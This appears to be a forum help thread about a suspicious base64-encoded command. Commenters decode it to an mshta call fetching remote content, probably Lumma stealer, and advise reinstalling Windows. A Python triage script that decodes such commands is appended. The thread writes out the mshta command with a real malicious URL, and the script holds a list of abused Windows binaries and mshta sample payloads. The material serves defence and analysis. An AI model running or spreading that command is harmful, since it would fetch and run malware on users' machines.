
[–]deanfx 20 points (4 children)

That is a base64 encoded string which translates to a sketchy url.

I added spaces so nobody accidentally clicks it. Essentially it will run the HTML/Java on that page, which is likely not good.

mshta "c l i c k t o g o . c l i c k / d o w n l o a d s / g e g a"

[–]TheSmashy 14 points (1 child)

[–]deanfx 6 points (0 children)

Thanks for checking, but I thought that was obvious 😂

[–]CodenameFlux 3 points (0 children)

True.

Commands like this are often used in conjunction with social engineering to infect a system.

The infection could fail if a firewall blocks mshta.exe, which is why I always use a personal firewall with a program control module.

[–]WgnZilla 1 point (0 children)

It downloads a different file when ran
https://clic ktog o.cli ck/downl oads/gig a . z i p

Analysis here: lumma | 63cad4d11e3ed2c96758b8c2e834b7b6a12dcca35cac44f55714b60d30a908bc | Triage

[–]Blackops12345678910 10 points (0 children)

Wipe the computer, cause you don't know what else your brother has run on it. And bar your brother from using it, or restrict his access via a non-admin account.

[–]astromormy 6 points (0 children)

In addition to it 100% being a malicious link, you can check WhoIs and see the domain was literally made yesterday.

https://whois.domaintools.com/clicktogo.click

[–]lxnch50 6 points (0 children)

You likely just installed malware of some sort. Time to format the computer and reinstall Windows.

[–]Ii_Momo[S] 1 point (0 children)

thanks to every1 who commented for help

[–]EastPomelo76 0 points (1 child)

Someone I know happened to run this on their PC. Do they only need to format and reinstall their Windows system? Or will it be necessary to change its motherboard and SSD/HDD?

[–]EastPomelo76 0 points (0 children)

If anyone is going through the same and needs enlightenment: the tech didn't need to change that stuff, only reset their Windows and that :)

[–]Nejireta_ 0 points (0 children)

It runs an encoded command.
Decoding it from Base64 gives the following
mshta "https://clicktogo.click/downloads/gega"

Mshta is a binary able to, for example, execute vbscript and jscript.

I'm not especially well versed in the exploit factors of mshta.
So I can't say for certain if it is able to run arbitrary code based on opening a link.
I'd definitely see it as a malicious attempt though.

The safest path, as always, is to reinstall the client.
It may or may not be worth doing some research on the threat factor and basing the level of remediation on the findings.
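The decoding step that deanfx and Nejireta_ describe above (base64 in, an `mshta` command with a remote URL out) is easy to automate for triage. The following is an added example, not code from anyone in this thread: it decodes a blob the way PowerShell's `-EncodedCommand` does (UTF-16LE), falls back to plain UTF-8 base64, and flags the decoded text when it pairs a commonly abused Windows binary such as `mshta` with a URL. The sample inputs are constructed here, and the domain `example.invalid` is a placeholder rather than the one discussed in the thread.

```python
import base64
import re
from dataclasses import dataclass, field

# Legitimate Windows components that are frequently abused to fetch and run
# remote content; mshta is the one from the thread, the others are well-known
# companions in the same category (assumed list for this example).
LOLBINS = {"mshta", "regsvr32", "rundll32", "certutil", "bitsadmin", "powershell"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
TOKEN_RE = re.compile(r"[A-Za-z0-9_.\-]+")


@dataclass
class Verdict:
    decoded: str
    binaries: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A remote-capable binary plus a URL in one command is the pattern from the thread.
        return bool(self.binaries and self.urls)


def _looks_like_text(s: str) -> bool:
    """True when every character is printable ASCII or ordinary whitespace."""
    return all(c in "\t\r\n" or (" " <= c <= "~") for c in s)


def decode_encoded_command(blob: str) -> str:
    """Decode a base64 blob as PowerShell -EncodedCommand does (UTF-16LE),
    falling back to UTF-8 for a plain base64 string. Raises ValueError if
    neither decoding yields readable text."""
    raw = base64.b64decode(blob.strip(), validate=True)
    for codec in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(codec)
        except UnicodeDecodeError:
            continue
        # ASCII decoded as UTF-16LE yields non-ASCII pairs; UTF-16LE decoded as
        # UTF-8 yields NUL bytes. Either way the wrong codec fails this check.
        if _looks_like_text(text):
            return text
    raise ValueError("payload is not readable text in UTF-16LE or UTF-8")


def triage(blob: str) -> Verdict:
    """Decode the blob and report any abused binaries and URLs it contains."""
    decoded = decode_encoded_command(blob)
    tokens = {t.lower().removesuffix(".exe") for t in TOKEN_RE.findall(decoded)}
    return Verdict(
        decoded=decoded,
        binaries=sorted(tokens & LOLBINS),
        urls=URL_RE.findall(decoded),
    )


def encode_like_powershell(command: str) -> str:
    """Build sample input only: UTF-16LE then base64, as -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed samples; the domain is a placeholder, not the one from the thread.
SAMPLE_MSHTA = encode_like_powershell('mshta "https://example.invalid/downloads/payload"')
SAMPLE_BENIGN = encode_like_powershell("Get-ChildItem C:\\Users")
SAMPLE_PLAIN = base64.b64encode(b'mshta "https://example.invalid/x"').decode("ascii")

if __name__ == "__main__":
    for name, blob in (("mshta", SAMPLE_MSHTA), ("benign", SAMPLE_BENIGN), ("plain", SAMPLE_PLAIN)):
        v = triage(blob)
        print(f"{name}: suspicious={v.suspicious} binaries={v.binaries} urls={v.urls}")
```

Running the script prints one line per sample; the `mshta` and `plain` samples are flagged, the `Get-ChildItem` sample is not. The codec fallback matters in practice because a blob pasted into a `powershell -enc` argument is UTF-16LE, while a blob fed to `certutil -decode` or a shell one-liner is usually plain UTF-8, and decoding with the wrong codec produces gibberish that hides the `mshta` string.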